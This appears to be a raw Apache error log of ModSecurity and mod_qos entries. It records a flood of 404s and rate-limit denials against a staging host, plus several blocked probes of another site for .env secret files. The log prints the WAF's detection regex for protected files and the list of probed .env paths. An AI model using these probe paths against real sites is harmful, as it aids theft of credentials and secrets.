[Tue May 26 19:55:01.298133 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVSQAAAAg"]
[Tue May 26 19:55:01.298929 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVPgAAAGM"]
[Tue May 26 19:55:01.306929 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVSwAAACk"]
[Tue May 26 19:55:01.309504 2026] [security2:error] [pid 93576:tid 93742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVRwAAAB4"]
[Tue May 26 19:55:01.317006 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVTgAAABo"]
[Tue May 26 19:55:01.332522 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVUQAAAEQ"]
[Tue May 26 19:55:01.336839 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVVgAAAGg"]
[Tue May 26 19:55:01.348909 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVTAAAAGU"]
[Tue May 26 19:55:01.361452 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVTwAAAB0"]
[Tue May 26 19:55:01.364857 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPGDRMqfxdEDkoszVbQAAAEg"]
[Tue May 26 19:55:01.369422 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVSgAAAD8"]
[Tue May 26 19:55:01.376406 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVWQAAADg"]
[Tue May 26 19:55:01.378009 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPGDRMqfxdEDkoszVcAAAAHI"]
[Tue May 26 19:55:01.378016 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVUgAAADA"]
[Tue May 26 19:55:01.383358 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVVAAAAHg"]
[Tue May 26 19:55:01.403034 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N4wAAAcM"]
[Tue May 26 19:55:01.403715 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPFZMwN0DpLVWo6LJ7QAAAQQ"]
[Tue May 26 19:55:01.409020 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVUwAAAA8"]
[Tue May 26 19:55:01.411013 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPFZMwN0DpLVWo6LJ7AAAAKU"]
[Tue May 26 19:55:01.415638 2026] [security2:error] [pid 86490:tid 86682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPFZMwN0DpLVWo6LJ6QAAAMM"]
[Tue May 26 19:55:01.433617 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N3gAAAck"]
[Tue May 26 19:55:01.439783 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPGDRMqfxdEDkoszVbwAAAD0"]
[Tue May 26 19:55:01.439824 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N0gAAAZs"]
[Tue May 26 19:55:01.443481 2026] [security2:error] [pid 93868:tid 94259] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N4gAAAZA"]
[Tue May 26 19:55:01.454827 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N3wAAAbg"]
[Tue May 26 19:55:01.456353 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N4QAAAgU"]
[Tue May 26 19:55:01.709544 2026] [security2:error] [pid 86490:tid 86698] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database/secrets/.env"] [unique_id "ahWtPVZMwN0DpLVWo6LKIQAAANM"]
[Tue May 26 19:55:01.800379 2026] [security2:error] [pid 86490:tid 86635] [client 195.226.194.95:39328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.194.226.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKIAAAAJQ"], referer: https://afstpaul.org/
[Tue May 26 19:55:01.870929 2026] [security2:error] [pid 86490:tid 86735] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/rails_app/config/.env"] [unique_id "ahWtPVZMwN0DpLVWo6LKJwAAAPg"]
[Tue May 26 19:55:01.921222 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPWDRMqfxdEDkoszVtQAAACk
[Tue May 26 19:55:01.921513 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPWDRMqfxdEDkoszVtgAAAHA
[Tue May 26 19:55:01.921533 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtPWDRMqfxdEDkoszVtwAAAAM
[Tue May 26 19:55:01.922652 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPWDRMqfxdEDkoszVuwAAAGI
[Tue May 26 19:55:01.926779 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPWDRMqfxdEDkoszVvgAAABE
[Tue May 26 19:55:01.928073 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPWDRMqfxdEDkoszVwAAAACE
[Tue May 26 19:55:01.928301 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPWDRMqfxdEDkoszVwQAAAHw
[Tue May 26 19:55:01.930396 2026] [qos:error] [pid 93868:tid 94271] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPUqK9k_ZUB2Vp25OJAAAAZw
[Tue May 26 19:55:02.031881 2026] [security2:error] [pid 86490:tid 86674] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/rust-app/.env"] [unique_id "ahWtPlZMwN0DpLVWo6LKUQAAALs"]
[Tue May 26 19:55:02.032860 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OJgAAAe8
[Tue May 26 19:55:02.071909 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:60006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OJwAAAfM
[Tue May 26 19:55:02.074273 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKUgAAAOc
[Tue May 26 19:55:02.074320 2026] [qos:error] [pid 93868:tid 94381] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OKAAAAgo
[Tue May 26 19:55:02.077121 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKUwAAALQ
[Tue May 26 19:55:02.078219 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:60196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKVAAAAJI
[Tue May 26 19:55:02.078281 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:60074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKVQAAAPE
[Tue May 26 19:55:02.079598 2026] [qos:error] [pid 93868:tid 94274] [client 45.148.10.120:43412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OKQAAAZ8
[Tue May 26 19:55:02.094092 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszVxgAAADM
[Tue May 26 19:55:02.193066 2026] [security2:error] [pid 86490:tid 86678] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/tests/.env"] [unique_id "ahWtPlZMwN0DpLVWo6LKWgAAAL8"]
[Tue May 26 19:55:02.208427 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OLgAAAcY
[Tue May 26 19:55:02.220776 2026] [qos:error] [pid 93868:tid 94288] [client 45.148.10.120:60006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OLwAAAa0
[Tue May 26 19:55:02.224271 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKWwAAAPs
[Tue May 26 19:55:02.225132 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OMAAAAbA
[Tue May 26 19:55:02.225891 2026] [qos:error] [pid 86490:tid 86642] [client 45.148.10.120:60196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKXAAAAJs
[Tue May 26 19:55:02.228532 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:60074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKXQAAAKw
[Tue May 26 19:55:02.231179 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:43412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OMQAAAbM
[Tue May 26 19:55:02.233948 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKXgAAAMA
[Tue May 26 19:55:02.243454 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszVyAAAAD8
[Tue May 26 19:55:02.244020 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:43452] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszVyQAAAEg
[Tue May 26 19:55:02.274485 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPFZMwN0DpLVWo6LJ8QAAAOU"]
[Tue May 26 19:55:02.279399 2026] [security2:error] [pid 93868:tid 94287] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N5wAAAaw"]
[Tue May 26 19:55:02.281552 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPGDRMqfxdEDkoszVbgAAACc"]
[Tue May 26 19:55:02.284034 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPGDRMqfxdEDkoszVdgAAAFw"]
[Tue May 26 19:55:02.296057 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPGDRMqfxdEDkoszVgAAAAHk"]
[Tue May 26 19:55:02.299450 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N4AAAAgk"]
[Tue May 26 19:55:02.307766 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPGDRMqfxdEDkoszVdAAAADU"]
[Tue May 26 19:55:02.310877 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N6AAAAeo"]
[Tue May 26 19:55:02.317957 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N8AAAAZQ"]
[Tue May 26 19:55:02.324414 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N6QAAAaY"]
[Tue May 26 19:55:02.337454 2026] [security2:error] [pid 93868:tid 94279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N2wAAAaQ"]
[Tue May 26 19:55:02.340581 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N5gAAAds"]
[Tue May 26 19:55:02.353817 2026] [security2:error] [pid 86490:tid 86747] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hgs-static/.env"] [unique_id "ahWtPlZMwN0DpLVWo6LKYwAAAQQ"]
[Tue May 26 19:55:02.354338 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPFZMwN0DpLVWo6LKBQAAAO4"]
[Tue May 26 19:55:02.374320 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPGDRMqfxdEDkoszVfAAAABg"]
[Tue May 26 19:55:02.375934 2026] [security2:error] [pid 86490:tid 86746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKOQAAAQM"]
[Tue May 26 19:55:02.381598 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVlQAAAG0"]
[Tue May 26 19:55:02.390453 2026] [security2:error] [pid 86490:tid 86629] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKNQAAAI4"]
[Tue May 26 19:55:02.390610 2026] [security2:error] [pid 93868:tid 94365] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N7gAAAfo"]
